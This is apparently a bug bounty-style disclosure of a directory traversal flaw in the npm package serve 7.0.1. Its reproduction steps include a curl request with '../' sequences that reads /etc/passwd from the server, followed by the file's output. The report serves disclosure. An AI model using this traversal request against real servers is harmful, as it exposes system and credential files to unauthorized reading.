[serve] Server Directory Traversal

I would like to report a Server Directory Traversal vulnerability in **serve**. It allows reading local files on the target server. # Module **module name:** serve **version:** 7.0.1 **npm page:** https://www.npmjs.com/package/serve ## Module Description *Assuming you would like to serve a static site, single page application or just a static file (no matter if on your device or on the local network), this package is just the right choice for you.* *It behaves exactly like static deployments on Now, so it's perfect for developing your static project. Then, when it's time to push it into production, you deploy it.* *Furthermore, it also provides a neat interface for listing the directory's contents* # Vulnerability ## Steps To Reproduce: * Install the module `$ npm i serve` * Start the server `$ ./node_modules/serve/bin/serve.js` * Using the below request to access the file `/etc/passwd` on the target server: ``` $ curl --path-as-is 'http://127.0.0.1:3000/../../../../../../etc/passwd' ## # User Database # # Note that this file is consulted directly only when the system is running # in single-user mode. At other times this information is provided by # Open Directory. # # See the opendirectoryd(8) man page for additional information about # Open Directory. ## nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false root:*:0:0:System Administrator:/var/root:/bin/sh daemon:*:1:1:System Services:/var/root:/usr/bin/false ... ``` ## Supporting Material/References: * macOS High Sierra 10.13.4 * node v8.10.0 * npm 6.1.0 * curl 7.54.0 # Wrap up - I contacted the maintainer to let them know: N - I opened an issue in the related repository: N ## Impact It allows reading local files on the target server